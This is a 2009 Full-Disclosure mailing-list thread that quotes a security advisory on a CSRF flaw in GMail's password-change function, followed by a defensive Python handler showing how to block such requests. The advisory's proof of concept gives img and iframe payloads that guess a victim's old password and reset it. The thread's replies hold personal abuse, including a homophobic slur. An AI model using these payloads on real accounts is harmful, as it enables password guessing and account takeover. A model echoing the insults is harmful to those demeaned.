-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mr. Stark,

Your body fat seems to be fairly high, you should consider a cutting phase and quitting the muscle milk and whatever cheap steroids you use. You're looking like a fat dumb homosexual in those tights. Someone with your levels of insecurity shouldn't be in computer security.

- -bm

On Wed, 04 Mar 2009 16:44:50 -0500 Jason Starks <[email protected]> wrote:
>Ah, probably not. Your stringing together words to make sentences is what
>I'll regret reading. I'll continue to use my muscle milk and you'll continue
>to work your 9-5. The world turns once again!
>
>On Wed, Mar 4, 2009 at 4:06 PM, Valdis' Mustache <[email protected]> wrote:
>
>> Mister Snarks,
>>
>> I've never been anything but who I purport to be, the humble upper
>> facial hair quadrant of a loquacious sysadmin. Low of birth, though
>> noble in aspiration, a student of history and of the many mustaches
>> who came before myself.
>>
>> You, young scholar, should be wary, though! Prospective employers do
>> make regular use of search engines, "googling" potential candidates to
>> gain insight into possible character flaws!
>>
>> True, your clean and jerk abilities as archived on the YouTube are
>> admirable, but acting a fool on security lists is something normally
>> reserved only for those in academia, who are markedly difficult if not
>> impossible to unseat from their comfortable chairs, as indisputably
>> underscored by the e-antics of this mustache's owner, and, of course,
>> Mssr. Schmehl.
>>
>> You'll come to regret your lack of anonymity, as your posts will live
>> on for eternity, much as I've come to regret my unfortunate
>> association with the unruly beardlike growth connecting to me from the
>> south, and my unavoidable tenuous connection with those objectionable
>> and uncouth sideburns.
>>
>>
>> Your humble servant,
>> I baffi di Valdis
>>
>> On Wed, Mar 4, 2009 at 12:55 PM, Jason Starks <[email protected]> wrote:
>> > I know, it's insane. It is a new trend, though, just like people registering
>> > gmail accounts just to flame and troll on FD!
>> >
>> > It's like, your credibility like, goes like, ok you start like at 0, and then
>> > like, it goes like to -1, and like, then even lower like.
>> >
>> > Absolutely genius.
>> >
>> > x0x0x0x0x0x0x0x0x0x
>> >
>> > On Tue, Mar 3, 2009 at 6:28 PM, Biz Marqee <[email protected]> wrote:
>> >>
>> >> This was 2 years well spent... NOT!
>> >>
>> >> Seriously what is with all these people popping up releasing advisories
>> >> that are absolute SHIT? Is it to try and get jobs or what?
>> >>
>> >>
>> >> On Tue, Mar 3, 2009 at :55 AM, ISecAuditors Security Advisories <
>> >> advisories at isecauditors.com> wrote:
>> >>
>> >> > =============================================
>> >> > INTERNET SECURITY AUDITORS ALERT 2007-003
>> >> > - Original release date: August 1st, 2007
>> >> > - Last revised: January 11th, 2009
>> >> > - Discovered by: Vicente Aguilera Diaz
>> >> > - Severity: 3/5
>> >> > =============================================
>> >> >
>> >> > I. VULNERABILITY
>> >> > -------------------------
>> >> > CSRF vulnerability in GMail service
>> >> >
>> >> > II. BACKGROUND
>> >> > -------------------------
>> >> > Gmail is Google's free webmail service. It comes with built-in Google
>> >> > search technology and over 2,600 megabytes of storage (and growing
>> >> > every day). You can keep all your important messages, files and
>> >> > pictures forever, use search to quickly and easily find anything
>> >> > you're looking for, and make sense of it all with a new way of viewing
>> >> > messages as part of conversations.
>> >> >
>> >> > III. DESCRIPTION
>> >> > -------------------------
>> >> > Cross-Site Request Forgery, also known as one click attack or session
>> >> > riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of
>> >> > malicious exploit of websites. Although this type of attack has
>> >> > similarities to cross-site scripting (XSS), cross-site scripting
>> >> > requires the attacker to inject unauthorized code into a website,
>> >> > while cross-site request forgery merely transmits unauthorized
>> >> > commands from a user the website trusts.
>> >> >
>> >> > GMail is vulnerable to CSRF attacks in the "Change Password"
>> >> > functionality. The only token to authenticate the user is a session
>> >> > cookie, and this cookie is sent automatically by the browser in every
>> >> > request.
>> >> >
>> >> > An attacker can create a page that includes requests to the "Change
>> >> > password" functionality of GMail and modify the passwords of the users
>> >> > who, being authenticated, visit the page of the attacker.
>> >> >
>> >> > The attack is facilitated since the "Change Password" request can be
>> >> > performed via the HTTP GET method instead of the POST method that is
>> >> > habitually used by the "Change Password" form.
>> >> >
>> >> > IV. PROOF OF CONCEPT
>> >> > -------------------------
>> >> > 1. An attacker creates a web page "csrf-attack.html" that makes many
>> >> > HTTP GET requests to the "Change Password" functionality.
>> >> >
>> >> > For example, a password cracking of 3 attempts (see "OldPasswd"
>> >> > parameter):
>> >> > ...
>> >> > <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>> >> > <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>> >> > <img src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>> >> > ...
>> >> >
>> >> > or with hidden frames:
>> >> > ...
>> >> > <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>> >> > <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>> >> > <iframe src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
>> >> > ...
>> >> >
>> >> > The attacker can deliberately use a weak new password (see "Passwd"
>> >> > and "PasswdAgain" parameters); this way he can know if the analysed
>> >> > password is correct without needing to modify the password of the
>> >> > victim user.
>> >> >
>> >> > Using weak passwords the "Change Password" response is:
>> >> > - " The password you gave is incorrect. ", if the analysed password
>> >> > is not correct.
>> >> > - " We're sorry, but you've selected an insecure password. In order
>> >> > to protect the security of your account, please click "Password
>> >> > Strength" to get tips on choosing to safer password. ", if the
>> >> > analysed password is correct and the victim password is not modified.
>> >> >
>> >> > If the attacker wants to modify the password of the victim user, the
>> >> > expected response message is: " Your new password has been saved - OK ".
>> >> >
>> >> > In any case, the attacker evades the restrictions imposed by the
>> >> > captcha of the authentication form.
>> >> >
>> >> > 2. A user authenticated in GMail visits the "csrf-attack.html" page
>> >> > controlled by the attacker.
>> >> >
>> >> > For example, the attacker sends a mail to the victim (a GMail account)
>> >> > and provokes the victim into visiting his page (social engineering). So,
>> >> > the attacker ensures that the victim is authenticated.
>> >> >
>> >> > 3. The password cracking is executed transparently to the victim.
>> >> >
>> >> > V. BUSINESS IMPACT
>> >> > -------------------------
>> >> > - Selective DoS on users of the GMail service (changing user password).
>> >> > - Possible access to the mail of other GMail users.
>> >> >
>> >> > VI. SYSTEMS AFFECTED
>> >> > -------------------------
>> >> > Gmail service.
>> >> >
>> >> > VII. SOLUTION
>> >> > -------------------------
>> >> > No solution provided by vendor.
>> >> >
>> >> > VIII. REFERENCES
>> >> > -------------------------
>> >> > http://www.gmail.com
>> >> >
>> >> > IX. CREDITS
>> >> > -------------------------
>> >> > This vulnerability has been discovered and reported by
>> >> > Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).
>> >> >
>> >> > X. REVISION HISTORY
>> >> > -------------------------
>> >> > July 31, 2007: Initial release
>> >> > August 1, 2007: Few corrections.
>> >> > December 30, 2008: Last details.
>> >> >
>> >> > XI. DISCLOSURE TIMELINE
>> >> > -------------------------
>> >> > July 30, 2007: Vulnerability acquired by
>> >> >                Internet Security Auditors.
>> >> > August 1, 2007: Initial notification sent to the
>> >> >                 Google security team.
>> >> > August 1, 2007: Google security team requests additional
>> >> >                 information about and starts reviewing the
>> >> >                 vulnerability.
>> >> > August 13, 2007: Request information about the status.
>> >> > August 15, 2007: Google security team responds that they are still
>> >> >                  working on this.
>> >> > September 19, 2007: Request for the status. No response.
>> >> > November 26, 2007: Request for the status. No response.
>> >> > January 2, 2008: Request for the status. No response.
>> >> > January 4, 2008: Request for the status. No response.
>> >> > January 11, 2008: Request for the status. No response.
>> >> > January 15, 2008: Request for the status. Automated response.
>> >> > January 18, 2008: Google security team informs that they don't expect
>> >> >                   behaviour to change in the short term, giving
>> >> >                   the justification.
>> >> >                   We deconstruct those arguments as insufficient.
>> >> >                   No more responses.
>> >> > December 30, 2008: Request for the status. Confirmation from Google
>> >> >                    they won't change their consideration about this.
>> >> > January 11, 2009: Publication to Bugtraq. Rejected twice.
>> >> >                   No reasons.
>> >> > March 03, 2009: General publication for disclosure in other lists.
>> >> >
>> >> > XII. LEGAL NOTICES
>> >> > -------------------------
>> >> > The information contained within this advisory is supplied "as-is"
>> >> > with no warranties or guarantees of fitness of use or otherwise.
>> >> > Internet Security Auditors accepts no responsibility for any damage
>> >> > caused by the use or misuse of this information.
>> >> >
>> >> > _______________________________________________
>> >> > Full-Disclosure - We believe in it.
>> >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> > Hosted and sponsored by Secunia - http://secunia.com/
>> >> >
>> >>
>> >
>>
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkmvIAQACgkQhNp8gzZx3sifPQP/Z/JwoxHfL+/YWIumE6ohkDzHigcM
FFMGnJtPy1PUYahP2Kkq4oBUiFgNsqWsBjvNnp+hrILgO6w73OasuLZQSvYX7hCMK8k1
eK7r0H5fjSlqoRhkJSGhgBDL4H7q1nMrkr0x4zGO7Jeeeq8DuU23x2A1UvnJCE+RAo65
vFaHNwE=
=uYwk
-----END PGP SIGNATURE-----
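The advisory quoted above turns on two server-side weaknesses: the "Change Password" action was accepted over HTTP GET, and the session cookie, which the browser attaches to every request on its own, was the only thing authenticating it, so the response also worked as an oracle for the old password. The following Python handler is an added example, not code from the advisory, the thread or Google, showing the controls a defender would expect that endpoint to have: POST only, an Origin/Referer check, a per-session anti-CSRF token compared in constant time, and re-authentication with the old password only after the request has been proven same-site. The SITE_ORIGIN value, the in-memory SESSIONS store, the cookie name SID, the attacker Referer, the password policy and the response strings are all constructed for the example; only the parameter names and the first proof-of-concept URL are taken from the advisory.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Assumed origin of the web application (constructed); any other Origin is cross-site.
SITE_ORIGIN = "https://www.example.test"

# Constructed in-memory session store: cookie value -> account state. Each session
# carries its own random anti-CSRF token, which a page on another origin cannot read.
SESSIONS = {
    "sess-victim": {
        "user": "victim",
        "password": "PASSWORD2",
        "csrf_token": secrets.token_urlsafe(32),
    },
}


def csrf_token_for(session_id):
    """Token the legitimate change-password form embeds as a hidden field."""
    return SESSIONS[session_id]["csrf_token"]


def _same(a, b):
    """Constant-time string comparison (avoids leaking the match position by timing)."""
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


def handle_change_password(method, headers, cookies, form):
    """Server-side "Change Password" handler. Returns (status, message).

    Checks that do not depend on the submitted passwords run first, so a forged
    request gets the same answer whether or not OldPasswd was right: no oracle.
    """
    # 1. State-changing actions are POST only. <img src> and <iframe src> can
    #    only issue GET requests, so the advisory's vector is rejected here.
    if method != "POST":
        return 405, "Method not allowed"

    # 2. The session cookie identifies the user, but the browser sends it
    #    automatically, so on its own it says nothing about who built the request.
    session = SESSIONS.get(cookies.get("SID", ""))
    if session is None:
        return 401, "Not signed in"

    # 3. Reject requests whose Origin (or, failing that, Referer) is another site.
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is not None:
        parts = urlsplit(origin)
        if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
            return 403, "Cross-site request rejected"

    # 4. Require the per-session secret before looking at any password field.
    if not _same(form.get("csrf_token", ""), session["csrf_token"]):
        return 403, "Cross-site request rejected"

    # 5. Only now is OldPasswd consulted; it acts as re-authentication.
    if not _same(form.get("OldPasswd", ""), session["password"]):
        return 400, "The password you gave is incorrect."
    new_password = form.get("Passwd", "")
    if new_password != form.get("PasswdAgain", ""):
        return 400, "Passwords do not match."
    if len(new_password) < 8:  # constructed minimal policy
        return 400, "Insecure password rejected."

    session["password"] = new_password
    return 200, "Your new password has been saved."


def request_from_advisory_url(url, cookies):
    """Model what the victim's browser sends while loading the attacker's <img>:
    a GET, the victim's own cookies, and a cross-site Referer (constructed)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    params = {k: v[0] for k, v in query.items()}
    headers = {"Referer": "https://attacker.example/csrf-attack.html"}
    return "GET", headers, cookies, params


# First URL from the advisory's proof of concept, used here only as sample input.
ADVISORY_URL = ("https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en"
                "&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123"
                "&PasswdAgain=abc123&p=&save=Save")

if __name__ == "__main__":
    victim = {"SID": "sess-victim"}
    print(handle_change_password(*request_from_advisory_url(ADVISORY_URL, victim)))
    forged = {"Origin": "https://attacker.example"}
    print(handle_change_password("POST", forged, victim,
                                 {"OldPasswd": "PASSWORD2", "Passwd": "abc123", "PasswdAgain": "abc123"}))
    good = {"Origin": SITE_ORIGIN}
    print(handle_change_password("POST", good, victim,
                                 {"csrf_token": csrf_token_for("sess-victim"), "OldPasswd": "PASSWORD2",
                                  "Passwd": "correct-horse-battery", "PasswdAgain": "correct-horse-battery"}))
```

The order of the checks is the point: the advisory's oracle exists because the server compared OldPasswd before it had any evidence the request was intentional. Here a forged POST with the right old password and one with a wrong one both get the identical 403, and the GET form of the request never reaches the password logic at all.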
